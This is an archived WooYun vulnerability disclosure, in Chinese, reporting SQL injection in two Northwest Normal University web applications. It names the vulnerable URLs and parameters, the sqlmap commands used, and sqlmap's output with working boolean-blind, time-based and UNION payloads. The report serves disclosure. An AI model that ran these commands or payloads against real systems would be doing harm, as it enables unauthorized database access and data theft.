当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133514

漏洞标题:西北师范大学SQL注射漏洞

相关厂商:CCERT教育网应急响应组

漏洞作者: 雨鸡

提交时间:2015-08-13 22:42

修复时间:2015-08-18 22:44

公开时间:2015-08-18 22:44

漏洞类型:网络设计缺陷/逻辑错误

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我爱高校~~

详细说明:

没有深入 只是大概扫了一下 get2个
注射点1:http://www.nwnu.edu.cn/cate.do?dept=0018
注射点2:http://eduyun.nwnu.edu.cn/websites/index.php?g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198

漏洞证明:

python sqlmap.py -u "http://www.nwnu.edu.cn/cate.do?dept=0018"


---
Parameter: dept (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dept=0018' AND 6007=6007 AND 'WyuN'='WyuN
---


[01:30:29] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0.2


python sqlmap.py -u "http://eduyun.nwnu.edu.cn/websites/index.php?g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198"


sqlmap identified the following injection point(s) with a total of 1211 HTTP(s) requests:
---
Parameter: articleid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198) AND 2163=2163 AND (2552=2552
    Type: UNION query
    Title: Generic UNION query (88) - 6 columns
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=-3457) UNION ALL SELECT 88,88,88,88,88,CONCAT(0x716b717871,0x4e4d624f6d4952786350,0x71626b6b71)-- 
Parameter: webid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043) AND 3194=3194 AND (9197=9197&id=1000077&channelid=1000079&articleid=1001198
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043) AND (SELECT * FROM (SELECT(SLEEP(5)))nfLB) AND (7937=7937&id=1000077&channelid=1000079&articleid=1001198
    Type: UNION query
    Title: Generic UNION query (88) - 3 columns
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=-1937) UNION ALL SELECT 88,CONCAT(0x716b717871,0x47536b505553534a4e47,0x71626b6b71),88-- &id=1000077&channelid=1000079&articleid=1001198
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077) AND 4550=4550 AND (8947=8947&channelid=1000079&articleid=1001198
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: webid, type: Unescaped numeric (default)
[1] place: GET, parameter: id, type: Unescaped numeric
[2] place: GET, parameter: articleid, type: Unescaped numeric
[q] Quit


后面这个没有再进一步,只是给出证明

修复方案:

你懂~~

版权声明:转载请注明来源 雨鸡@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-18 22:44

厂商回复:

最新状态:

暂无